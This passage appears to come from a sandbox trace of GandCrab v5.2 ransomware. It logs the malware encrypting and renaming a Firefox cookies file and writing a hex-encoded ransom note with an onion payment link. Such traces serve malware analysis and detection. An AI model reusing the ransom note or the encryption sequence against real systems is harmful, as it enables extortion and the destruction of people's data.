dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0080.771] GetLastError () returned 0x0 [0080.771] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.772] CryptDestroyKey (hKey=0x503738) returned 1 [0080.772] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.772] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.772] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.772] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4cdb38) returned 1 [0080.775] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.775] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503238) returned 1 [0080.776] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.776] CryptGetKeyParam (in: hKey=0x503238, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0080.776] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.776] CryptEncrypt (in: hKey=0x503238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0080.776] GetLastError () returned 0x0 [0080.776] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.776] CryptDestroyKey (hKey=0x503238) returned 1 [0080.776] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.777] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.777] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0080.777] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0080.777] ReadFile (in: hFile=0x2d4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e78c*=0x80000, lpOverlapped=0x0) returned 1 [0080.809] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfff80000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.809] WriteFile (in: hFile=0x2d4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e770*=0x80000, lpOverlapped=0x0) returned 1 [0080.814] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.814] WriteFile (in: hFile=0x2d4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0080.819] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.822] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.824] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.824] CloseHandle (hObject=0x2d4) returned 1 [0080.832] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cookies.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\cookies.sqlite"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cookies.sqlite.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\cookies.sqlite.titwmvjl"), dwFlags=0x1) returned 1 [0080.833] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.833] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0080.833] lstrcmpW (lpString1="crashes", lpString2=".") returned 1 [0080.833] lstrcmpW (lpString1="crashes", lpString2="..") returned 1 [0080.833] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="crashes" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes" [0080.833] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\" [0080.833] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0080.834] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0080.834] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0080.834] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0080.834] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0080.834] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0080.834] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0080.834] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0080.834] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0080.834] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.835] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0080.835] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\\\TITWMVJL-DECRYPT.txt") returned 109 [0080.835] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\crashes\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0080.835] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x